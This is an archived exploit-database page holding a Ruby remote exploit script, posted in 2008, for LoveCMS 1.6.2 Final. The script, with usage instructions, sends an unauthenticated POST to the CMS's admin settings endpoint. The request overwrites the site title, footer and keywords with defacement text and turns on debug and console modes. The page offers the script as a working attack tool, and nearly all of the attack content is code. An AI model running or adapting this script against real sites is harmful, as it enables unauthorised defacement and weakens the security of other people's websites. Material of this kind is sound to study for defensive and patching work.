exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lovecms-update.txt

lovecms-update.txt
Posted Aug 6, 2008
Authored by PoMdaPiMp

LoveCMS version 1.6.2 Final Update Setting remote exploit that manipulates site settings.

tags | exploit, remote
SHA-256 | d63a08a017585edabcfbef1997c9d25b584c5ca4992a4e456f3b5d4edf7cd547

lovecms-update.txt

Change Mirror Download
#!/usr/bin/ruby
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 3: changing site settings ...
##
## Description: Simply change the site settings !
##
## Usage: ./LoveCMS_3_settings.rb <host>
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
#

require 'net/http'
require 'uri'

@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'
@post_vars = {}
@post_vars['submit'] = 1
@post_vars['pagetitle'] = 'P4g3T1t1le'
@post_vars['sitename'] = 'SiteN4me'
@post_vars['slogan'] = 'By PoMdaPiMp.'
@post_vars['footer'] = 'PoMdaPiMp was here.'
@post_vars['description'] = 'Ruby is a gift.'
@post_vars['keywords'] = 'PoMdaPiMp, hack'
@post_vars['encoding'] = 'utf-8'
@post_vars['tips'] = 'off'
@post_vars['console'] = 'on'
@post_vars['debugmode'] = 'on'
@post_vars['module'] = 2
@post_vars['love_root'] = ''
@post_vars['love_url'] = ''

@host = ARGV[0] if ARGV[0]
@host += @host[-1, 1].to_s != '/' ? '/' : ''

if @host
# --
puts " + LoveCMS Exploit Series. #3: Messing with settings."
puts
puts " : Attacking host: " + @host

# --
# Changing settings
res = Net::HTTP.post_form(URI.parse(@host + 'system/admin/themes.php'),
@post_vars)
puts " :: Values set."
@post_vars.each do |k, v|
puts " " + k.to_s + " > " + v.to_s
end

# --
puts
puts " - Visit " + @host
end

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close